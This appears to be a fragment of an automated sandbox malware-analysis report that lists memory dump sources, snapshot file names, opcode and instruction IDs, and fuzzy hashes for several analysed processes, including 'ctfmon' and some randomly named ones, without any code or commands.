                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3cd0ecda2639163395a500337627962ca1540a649fede3de0b5faa15b4d2f5ec
                                                                                                                  • Instruction ID: 1adebb6184b79c33ef9780becc06f4045777fca1f124e4f6337cd53d57c82be0
                                                                                                                  • Opcode Fuzzy Hash: 3cd0ecda2639163395a500337627962ca1540a649fede3de0b5faa15b4d2f5ec
                                                                                                                  • Instruction Fuzzy Hash: B1317331A0964A8FDB85EB68C8A99F97BE1FF56300F0545BAC009D72A2DF28A841C740
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0255f56277f8a7c3c453ca42a8962b80a3e1cb7a85e2f2d1333ba454944dc57
                                                                                                                  • Instruction ID: ffa54091eadd474603db5a08ea016de2d931d6c2e5645e4f0ec450f57b98748f
                                                                                                                  • Opcode Fuzzy Hash: d0255f56277f8a7c3c453ca42a8962b80a3e1cb7a85e2f2d1333ba454944dc57
                                                                                                                  • Instruction Fuzzy Hash: 2121F321B1C6168FE718AB5C986937973C1FB99708F00037DE18ED33D2DE6CA80292C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04379ab4549e5a59e235779206c895f5ac1de8bb36f10047c9a8810a3fc880b7
                                                                                                                  • Instruction ID: 467af5d97d46dbcecadcf2d00b1e123aea09cd8e83c561dffb96b63af05a98ab
                                                                                                                  • Opcode Fuzzy Hash: 04379ab4549e5a59e235779206c895f5ac1de8bb36f10047c9a8810a3fc880b7
                                                                                                                  • Instruction Fuzzy Hash: F401D621B1FE4A0FDBD9E32D44A51B4B7E1EB9B21178401BAD54EC7192ED5CACC28381
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
                                                                                                                  • Instruction ID: 8d71182a12ca4557fc3a9a2e80e08b5a3de2469698398fce45db6864e7fa430c
                                                                                                                  • Opcode Fuzzy Hash: 886673dccda73dc56aa59fe30bdcf0cac5fdd763311fa1f4bf37c3e9ea170029
                                                                                                                  • Instruction Fuzzy Hash: F321F336A0D3898FE712DB6898A11DD7FB0EF53320F1542B7D144DB1C2D63826069791
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction ID: ee099f9becb69fa132d960b96461b51f5ffc9fab4e420bed93cb2536f349bccc
                                                                                                                  • Opcode Fuzzy Hash: c43ac0e9e8f2d9e9848485839fb2b27bacae8ab179e9e5e29731aa5b6dd3486f
                                                                                                                  • Instruction Fuzzy Hash: 6911A035A0D3899FE712DBB888A11DD7FB0AF53310F0645B6C184DB192D53866059790
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction ID: 00bd258087b8aa50fb41ec7739cd0323b6bd41a5294226edbc50420012944a7e
                                                                                                                  • Opcode Fuzzy Hash: d89e7ec08a6ea71a3d0057bcc14b09e7d0f000ffc8ec9ddd990ebd9703193181
                                                                                                                  • Instruction Fuzzy Hash: 7611AD35A0D3888FE712DBA8C8A02DD7FB0AF53310F0645FAC584DB192D63866499781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34890000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 039f075b9d327acd6604e723de641fc58b4e44e547a3d39b9fb42bcac8a536ff
                                                                                                                  • Instruction ID: eff30d029223622b77eed0c21e6cdcc19dc16e63689de206503cd7522ad1ea43
                                                                                                                  • Opcode Fuzzy Hash: 039f075b9d327acd6604e723de641fc58b4e44e547a3d39b9fb42bcac8a536ff
                                                                                                                  • Instruction Fuzzy Hash: 91014C71B0890A9BEB58DF84C4B46BE7BB1FF45304F14463AC51AD7294CF7869869780
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction ID: 7ebcc64d21dcadfa3fe12408f194a45b473b2fb467ed13154613d5d822934c91
                                                                                                                  • Opcode Fuzzy Hash: 6976a93242fbd27780d5fd075501feb3258e02f92eb9cd7c7cc8221085b819f1
                                                                                                                  • Instruction Fuzzy Hash: 00019E35A0D3888FE712DBB8C8A029D7FB0AF43310F1941EAC544DB192D6386A459781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction ID: a6f4ff8580bec2c082c93793a63f7ed62790e7166e93df983d1950a6c7e0dc9f
                                                                                                                  • Opcode Fuzzy Hash: fa3deed2b961f3e6d0c93fb18a1c804dfd74c861153203f99b0397e95b0a1971
                                                                                                                  • Instruction Fuzzy Hash: 64018F34E0D3899FE712DBB888A429D7FF0AF13310F1941EAC544DB193DA386A449781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 87e86ae87c6a9e1badb87847d1a17a8b1be6fbbdc9fc74a90b3f58c4b22e25dd
                                                                                                                  • Instruction ID: d4f69648199fba42d31b5ac6feb4c87e78fb80db106a0174ca8020eb0b4189af
                                                                                                                  • Opcode Fuzzy Hash: 87e86ae87c6a9e1badb87847d1a17a8b1be6fbbdc9fc74a90b3f58c4b22e25dd
                                                                                                                  • Instruction Fuzzy Hash: 31F0396191E7C45FD3229B398C664657FF0EE2721534E05EBC4CACB5B3DA5A888B8312
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3ac6082247e88947804e329f02794f0c8ccebbad0f409dcdb317a2658abd705c
                                                                                                                  • Instruction ID: 79a2e5a64e229bfe49b6c6d3f6dd15112ec08d066abba24a2833289720f01abd
                                                                                                                  • Opcode Fuzzy Hash: 3ac6082247e88947804e329f02794f0c8ccebbad0f409dcdb317a2658abd705c
                                                                                                                  • Instruction Fuzzy Hash: 5AE09230709B884FC70E963888A85507FB1EF6721138942DBC005CB2A3D919DC89C751
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34890000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction ID: 2d5fc9e48846ec678d3c575f3f40fb3ad51c740576c3f67cf6ad21f021c2ca47
                                                                                                                  • Opcode Fuzzy Hash: b8117e2188a0b56141778081712adbe53c36fc5b39b677d9a053a2a12162f0e6
                                                                                                                  • Instruction Fuzzy Hash: 43F0E530B0C94A4FE619DF0C98E05B93391EF87710F004175D51AC32D7DE3CA801A680
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: abdb4441e20a176a8713d7505d79926f62afb7714f32f0ffd207aa39025a564d
                                                                                                                  • Instruction ID: aa66d247f7ec616b28de9ecdacc81d8e6392e9d125bbfad4226d40d1c8392798
                                                                                                                  • Opcode Fuzzy Hash: abdb4441e20a176a8713d7505d79926f62afb7714f32f0ffd207aa39025a564d
                                                                                                                  • Instruction Fuzzy Hash: D1D05E30B60A094B8B0CB62D88A8430B3D1E7AA2067945278D40BC2291ED29ECCA8B81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction ID: cc1dbcfd56367301f083da3ad46f17e54c088d5b339500f8826ab87fbcf9a650
                                                                                                                  • Opcode Fuzzy Hash: 255e7228b3b5060bb0a1330e8f42c1cb0e77bcb87b0113081d35ece2dd2c332f
                                                                                                                  • Instruction Fuzzy Hash: FAE01231B0811647F795AB54C8A07B972A1EF8A300F110078DB5DD33C5DF3CAD009745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD348A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd348a3000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction ID: eb51c2ef2f49df78aeef9a35f10684ed442e681ab93358b0954b3b2169bd7c28
                                                                                                                  • Opcode Fuzzy Hash: 996b319ab35f1e6834f933f29f5f054e5ea3d76bb15de337fc4911b0dc83ebd8
                                                                                                                  • Instruction Fuzzy Hash: 3DC0123061080C8FCA88EB28C894E1473A0FB1A304B950094E00DCB2A1D62AECC2DB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction ID: 92a19b049061f1b79014d34d758ce98f48aeec7c507c9c60df3bb14c9814b990
                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: C6C0123062880E8FDA80BB28C888924BBA0FF4F301BE908E0E00CC71A1D61998908B02
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: f1bb64264544f2bb3d34ad0b68692d15da6e49be2bd9218b9f4269c231fb326f
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: B7C04C05F5B75B01A9D5736E58E60ADA2409FC7624FE31572D75CD0091AC4D20D52156
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.3747848425.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_7ffd34880000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d40adfab4259555daca3dcee5fc0016d430017eea9a9394dd9ef019b4f39c53e
                                                                                                                  • Instruction ID: 3da47a7ab6e4395290e458e5a191831dd0b5f26e88d097fd182c0b649738be1d
                                                                                                                  • Opcode Fuzzy Hash: d40adfab4259555daca3dcee5fc0016d430017eea9a9394dd9ef019b4f39c53e
                                                                                                                  • Instruction Fuzzy Hash: AEC04C16F1881A46F369735444725FE18565F45704F545434E10DD77CACF2C6E0116C6
                                                                                                                  • Instruction Fuzzy Hash: D9C08C01F18C2A02E369274400311FE08424F50300F541430E00DC33CACF2C2E0102C2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: 5c9538717dfbb204b014aa22264d4be7daafa63e35016c887e7dd86aa84dcd2d
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 04B01200E6740F00A48437BE08D206470405B47200FC91070D70CC0081A8CD20982363
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000033.00000002.2624487841.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_51_2_7ffd348a0000_fozAQGvSmfTQIywuzSgk.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9f7ed78d4ab93ff93b1e56f4d5d14cab7e19abe966447f83afdbe8aa09ba3898
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: E6C02B10E0901600E3A4473044601FDB1404F03300F06C071402ED6480DE2C17043340
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bb5301db1a6a85fd0fe853f0194b1b2fda8124b0a8f200a8af12be15ae795e3
                                                                                                                  • Instruction ID: 48126af7c2b127f3b4de73e87cb296fd586bac806c737473620c77f6689b2bb5
                                                                                                                  • Opcode Fuzzy Hash: 3bb5301db1a6a85fd0fe853f0194b1b2fda8124b0a8f200a8af12be15ae795e3
                                                                                                                  • Instruction Fuzzy Hash: F0D2A121B1891A4FEB99EB1884B57B873D2FF99300F1445B9D10ED72C6DE78BC829781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2e478bdd72c732a63940f64949adf4744abf69e2ae0b56d3a44916676e5ad862
                                                                                                                  • Instruction ID: 911e1a75126eae0d79da1d47fca4e499525f48cdf8070357627d10e171a95023
                                                                                                                  • Opcode Fuzzy Hash: 2e478bdd72c732a63940f64949adf4744abf69e2ae0b56d3a44916676e5ad862
                                                                                                                  • Instruction Fuzzy Hash: AC92A221B1891A4FEB98EB5884B56B873D1FF9A300F1445B9D14ED72C3DE78BC829781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 14b17faa47edd4571294b5532141f35b1b7cccec3db54f8a8ac319c2f1d6ef7a
                                                                                                                  • Instruction ID: fd0f3c98fbc03e5b22aeb078793f3612e94cd39d3be163f96885c95a024e9bf0
                                                                                                                  • Opcode Fuzzy Hash: 14b17faa47edd4571294b5532141f35b1b7cccec3db54f8a8ac319c2f1d6ef7a
                                                                                                                  • Instruction Fuzzy Hash: A182A221B1891A4FEB98EB1884B57B973E2FF99340F1445B9D10ED72C2DD78BC829781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1bc41d8f209e93589cd3a94b12b3ef2fcb43dcb142be5eb412ff93aee94c71b9
                                                                                                                  • Instruction ID: 0c578107ed422e8e538aa5d4d95ca607b71c69aaa4923f478d29465b14fd6f12
                                                                                                                  • Opcode Fuzzy Hash: 1bc41d8f209e93589cd3a94b12b3ef2fcb43dcb142be5eb412ff93aee94c71b9
                                                                                                                  • Instruction Fuzzy Hash: 0E91D275A18A994FEB89DFA888793A97FE1FF97310F0400BED149D72D2CA782415C750
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 7e9cad57eee0f1ffe39d6adf5631bcd2010e2e51175f648c9ca7564d46c27280
                                                                                                                  • Instruction ID: 6a6cd3ec0bffaf50c1e1cabc471e014736e4779f70dc6f6a8c52b235ff86b736
                                                                                                                  • Opcode Fuzzy Hash: 7e9cad57eee0f1ffe39d6adf5631bcd2010e2e51175f648c9ca7564d46c27280
                                                                                                                  • Instruction Fuzzy Hash: 6501DB30B1EA560FDB95E33944E55A8B7D1EF9721074401BAC54DC7192ED5CDC828381
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 8b5e28a268e1434c06637b6e34f0fa308cd40fe5ec2c2b7039152b4a5d08dca6
                                                                                                                  • Instruction ID: 63519dcbea4b694f083531692e1780d1b2f7fbe19ad696a86bd0f2fbe21308c4
                                                                                                                  • Opcode Fuzzy Hash: 8b5e28a268e1434c06637b6e34f0fa308cd40fe5ec2c2b7039152b4a5d08dca6
                                                                                                                  • Instruction Fuzzy Hash: 68F0203194E2D00FCF469A3884A44E0BFB0EF5B22074950EAC08ACF093EA19888BC741
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348b0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 056a8d99e83b1ef129f68035a25e89a941c461ffa59e2f977a44528da9eb4bfc
                                                                                                                  • Instruction ID: fc85d845d73ea144925c22543b71ca5a86f863183cbbdca9d9658e49eb6845fa
                                                                                                                  • Opcode Fuzzy Hash: 056a8d99e83b1ef129f68035a25e89a941c461ffa59e2f977a44528da9eb4bfc
                                                                                                                  • Instruction Fuzzy Hash: 0FF02271A0E3C04FCB16AA3488694487FA0EF6721074A11EEC046CF1E3EE2CC886C701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 1423db0c59d11c79dfa29496acc0754d4e0a771df7150a221dc4b3a415067bdd
                                                                                                                  • Instruction ID: 69a3b19b2e9cf87715256193df98c1f8a5ddd690601956b48bb3d438876de627
                                                                                                                  • Opcode Fuzzy Hash: 1423db0c59d11c79dfa29496acc0754d4e0a771df7150a221dc4b3a415067bdd
                                                                                                                  • Instruction Fuzzy Hash: C3F0A02164E3C04FCB169A348868445BFA0AF6721074901EEC046CF1A3DA1C8C86C701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: M
                                                                                                                  • API String ID: 0-3664761504
                                                                                                                  • Opcode ID: 816dc3a271245afeed0b6ccf39fd7f701cd2b6b92182504b07a3b4c8876d3ef3
                                                                                                                  • Instruction ID: 192058bb7524708705598f44818d54293998ca4faaa3e678c43ec6bf1dad48c1
                                                                                                                  • Opcode Fuzzy Hash: 816dc3a271245afeed0b6ccf39fd7f701cd2b6b92182504b07a3b4c8876d3ef3
                                                                                                                  • Instruction Fuzzy Hash: 08F0307154E7C04FCB16963488654557FA1AE6721174A51EEC146CB1A7DA1DC889C701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348c3000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: I
                                                                                                                  • API String ID: 0-3707901625
                                                                                                                  • Opcode ID: eed2c0aacbb2abafea2beffa3741e09b1e6aae4da2cafe4220cd024a67b72d77
                                                                                                                  • Instruction ID: 84bb4e0135656365c1d4f8293630e7c1256054e98799f2797e45484e70314e3a
                                                                                                                  • Opcode Fuzzy Hash: eed2c0aacbb2abafea2beffa3741e09b1e6aae4da2cafe4220cd024a67b72d77
                                                                                                                  • Instruction Fuzzy Hash: 0CE0126154E3C44FCB55EB3484A58557FA0EE6721074A40DEC145CB1B3E61D8846C701
                                                                                                                  Strings
